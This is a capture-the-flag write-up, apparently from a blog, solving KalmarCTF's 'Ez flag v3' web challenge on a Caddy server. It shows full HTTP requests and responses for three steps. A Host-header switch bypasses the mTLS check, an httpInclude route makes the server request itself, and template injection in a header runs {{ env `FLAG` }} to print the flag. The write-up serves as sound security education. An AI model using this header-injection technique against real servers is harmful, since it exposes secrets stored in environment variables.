tomek7667

KalmarCTF - Ez flag v3 - web - 93 solves

Ez flag v3 - web

  • Challenge description:

To get the flag, you need: the mTLS cert, connecting from localhost, … and break physics? Should be easy!

Challenge note: the handout files contains tls internal while the hosted challenge mostly use real TLS.

NOTE: Remote is working as intended! Even with the redirects.

  • Number of solves: 93
  • Points: 146

notice: all \{\{ and \}\} were without a backslash, but jekyll breaks when including raw double curly braces

The Challenge

The whole challenge is a Caddyfile which is a config adapter for Caddy:

{
        debug
        servers  {
                strict_sni_host insecure_off
        }
}

*.caddy.chal-kalmarc.tf {
        tls internal
        redir public.caddy.chal-kalmarc.tf
}

public.caddy.chal-kalmarc.tf {
        tls internal
        respond "PUBLIC LANDING PAGE. NO FUN HERE."
}

private.caddy.chal-kalmarc.tf {
        # Only admin with local mTLS cert can access
        tls internal {
                client_auth {
                        mode require_and_verify
                        trust_pool pki_root {
                                authority local
                        }
                }
        }

        # ... and you need to be on the server to get the flag
        route /flag {
                @denied1 not remote_ip 127.0.0.1
                respond @denied1 "No ..."

                # To be really really sure nobody gets the flag
                @denied2 `1 == 1`
                respond @denied2 "Would be too easy, right?"

                # Okay, you can have the flag:
                respond {$FLAG}
        }
        templates
        respond /cat     `\{\{ cat "HELLO" "WORLD" \}\}`
        respond /fetch/* `\{\{ httpInclude "/{http.request.orig_uri.path.1}" \}\}`
        respond /headers `\{\{ .Req.Header | mustToPrettyJson \}\}`
        respond /ip      `\{\{ .ClientIP \}\}`
        respond /whoami  `\{http.auth.user.id\}`
        respond "UNKNOWN ACTION"
}

I opened up burp, went to the challenge url, sent the request to the repeater, stripped it from all of its headers and that’s how I started working with the challenge.

Request:

GET /public.caddy.chal-kalmarc.tf HTTP/2
Host: caddy.chal-kalmarc.tf

Response:

HTTP/2 302 Found
Alt-Svc: h3=":443"; ma=2592000
Location: public.caddy.chal-kalmarc.tf
Server: Caddy
Content-Length: 0
Date: Sat, 15 Mar 2025 13:02:37 GMT

As you can see all of the fun igoing on in private.caddy.chall-kalmarc.tf { block:

private.caddy.chal-kalmarc.tf {
        # Only admin with local mTLS cert can access
        tls internal {
                client_auth {
                        mode require_and_verify
                        trust_pool pki_root {
                                authority local
                        }
                }
        }

        # ... and you need to be on the server to get the flag
        route /flag {
                @denied1 not remote_ip 127.0.0.1
                respond @denied1 "No ..."

                # To be really really sure nobody gets the flag
                @denied2 `1 == 1`
                respond @denied2 "Would be too easy, right?"

                # Okay, you can have the flag:
                respond {$FLAG}
        }
        templates
        respond /cat     `\{\{ cat "HELLO" "WORLD" \}\}`
        respond /fetch/* `\{\{ httpInclude "/{http.request.orig_uri.path.1}" \}\}`
        respond /headers `\{\{ .Req.Header | mustToPrettyJson \}\}`
        respond /ip      `\{\{ .ClientIP \}\}`
        respond /whoami  `{http.auth.user.id}`
        respond "UNKNOWN ACTION"
}

Let’s change the Host header and try accessing it (the actual target is still https://caddy.chall-kalmarc.tf):

Request:

GET / HTTP/2
Host: private.caddy.chal-kalmarc.tf

Response:

HTTP/2 200 OK
Alt-Svc: h3=":443"; ma=2592000
Content-Type: text/plain; charset=utf-8
Server: Caddy
Content-Length: 14
Date: Sat, 15 Mar 2025 13:04:00 GMT

UNKNOWN ACTION

Success! We got the execution of the last directive:

respond "UNKNOWN ACTION"

which means we bypassed the first validation:

# Only admin with local mTLS cert can access
tls internal {
        client_auth {
                mode require_and_verify
                trust_pool pki_root {
                        authority local
                }
        }
}

Great! If we try to access the flag directly:

route /flag {
        @denied1 not remote_ip 127.0.0.1
        respond @denied1 "No ..."

        # To be really really sure nobody gets the flag
        @denied2 `1 == 1`
        respond @denied2 "Would be too easy, right?"

        # Okay, you can have the flag:
        respond {$FLAG}
}

we can see that unless we have the actual remote_ip equal to the loopback address of the server, we will get the response No .... Let’s just make sure that happens:

Request:

GET /flag HTTP/2
Host: private.caddy.chal-kalmarc.tf

Response:

HTTP/2 200 OK
Alt-Svc: h3=":443"; ma=2592000
Content-Type: text/plain; charset=utf-8
Server: Caddy
Content-Length: 6
Date: Sat, 15 Mar 2025 13:06:16 GMT

No ...

Alright. Let’s see the templates and try to guess what they do:

templates
respond /cat     `\{\{ cat "HELLO" "WORLD" \}\}` << responds with HELLO WORLD
respond /fetch/* `\{\{ httpInclude "/{http.request.orig_uri.path.1}" \}\}` << probably creates another request via `httpInclude` directive to a path that is specified after /fetch/HERE_PATH
respond /headers `\{\{ .Req.Header | mustToPrettyJson \}\}` << responds with the headers sent with the request
respond /ip      `\{\{ .ClientIP \}\}` << responds with the client ip address
respond /whoami  `{http.auth.user.id}` << not useful as there's no auth here.

So that would mean that if we send a request to /fetch/flag we will bypass the next validation, as the request would be sent from the server by the httpInclude directive:

Request:

GET /fetch/flag HTTP/2
Host: private.caddy.chal-kalmarc.tf

Response:

HTTP/2 200 OK
Alt-Svc: h3=":443"; ma=2592000
Content-Type: text/plain; charset=utf-8
Server: Caddy
Content-Length: 25
Date: Sat, 15 Mar 2025 13:11:25 GMT

Would be too easy, right?

That’s right! So now we have a way to send requests to the server from the server. Let’s try to see what headers does the server use for httpInclude requests:

Request:

GET /fetch/headers HTTP/2
Host: private.caddy.chal-kalmarc.tf

Response:

HTTP/2 200 OK
Alt-Svc: h3=":443"; ma=2592000
Content-Type: text/plain; charset=utf-8
Server: Caddy
Content-Length: 89
Date: Sat, 15 Mar 2025 13:12:06 GMT

{
  "Accept-Encoding": [
    "identity"
  ],
  "Caddy-Templates-Include": [
    "1"
  ]
}

After reading Caddy source code I checked that Caddy-Templates-Include header is just a check for recursive requests limit, that just fails the request if it reaches 3.

Regarding the last check:

@denied2 `1 == 1`

it seems that it’s not bypassable in the /flag route. Let’s see if we can somehow include FLAG environment variable in the response of /fetch/headers as it displays our headers in the caddy httpInclude directive.

Request:

GET /fetch/headers HTTP/2
Host: private.caddy.chal-kalmarc.tf
Caddy-Templates-Include: 1
My-Header: $FLAG

Response:

HTTP/2 200 OK
Alt-Svc: h3=":443"; ma=2592000
Content-Type: text/plain; charset=utf-8
Server: Caddy
Content-Length: 123
Date: Sat, 15 Mar 2025 13:15:47 GMT

{
  "Accept-Encoding": [
    "identity"
  ],
  "Caddy-Templates-Include": [
    "2"
  ],
  "My-Header": [
    "$FLAG"
  ]
}

Not really.. But maybe it should be in curly braces so that evaluates instead of being passed as a string? Let’s try it:

Request:

GET /fetch/headers HTTP/2
Host: private.caddy.chal-kalmarc.tf
Caddy-Templates-Include: 1
My-Header: \{\{ $FLAG \}\}

Response:

HTTP/2 500 Internal Server Error
Alt-Svc: h3=":443"; ma=2592000
Content-Type: text/plain; charset=utf-8
Server: Caddy
Content-Length: 0
Date: Sat, 15 Mar 2025 13:16:59 GMT

Something triggered an internal server error! Let’s see, if we can at least execute some caddy directives like cat (raw " quotes result in internal server error so I used backticks instead):

Request:

GET /fetch/headers HTTP/2
Host: private.caddy.chal-kalmarc.tf
Caddy-Templates-Include: 1
My-Header: \{\{ cat `hi` \}\}

Response:

HTTP/2 200 OK
Alt-Svc: h3=":443"; ma=2592000
Content-Type: text/plain; charset=utf-8
Server: Caddy
Content-Length: 120
Date: Sat, 15 Mar 2025 13:18:42 GMT

{
  "Accept-Encoding": [
    "identity"
  ],
  "Caddy-Templates-Include": [
    "2"
  ],
  "My-Header": [
    "hi"
  ]
}

It worked! So we can have caddy directives but referencing the flag via $ doesn’t. Let’s see what directives is caddy specifically adding in their source code for templates. There it is:

// ##### `env`
//
// Gets an environment variable.
//

our flag is passed in as an environment variable via the dockerfile:

FROM caddy:2.9.1-alpine
COPY Caddyfile /etc/caddy/Caddyfile

ENV FLAG='kalmar{test}'

Let’s try to include the env directive instead of cat:

Request:

GET /fetch/headers HTTP/2
Host: private.caddy.chal-kalmarc.tf
Caddy-Templates-Include: 1
My-Header: \{\{ env `FLAG` \}\}

Response:

HTTP/2 200 OK
Alt-Svc: h3=":443"; ma=2592000
Content-Type: text/plain; charset=utf-8
Server: Caddy
Content-Length: 163
Date: Sat, 15 Mar 2025 13:23:47 GMT

{
  "Accept-Encoding": [
    "identity"
  ],
  "Caddy-Templates-Include": [
    "2"
  ],
  "My-Header": [
    "kalmar{4n0th3r_K4lmarCTF_An0Th3R_C4ddy_Ch4ll}"
  ]
}

and we got the flag!

kalmar{4n0th3r_K4lmarCTF_An0Th3R_C4ddy_Ch4ll}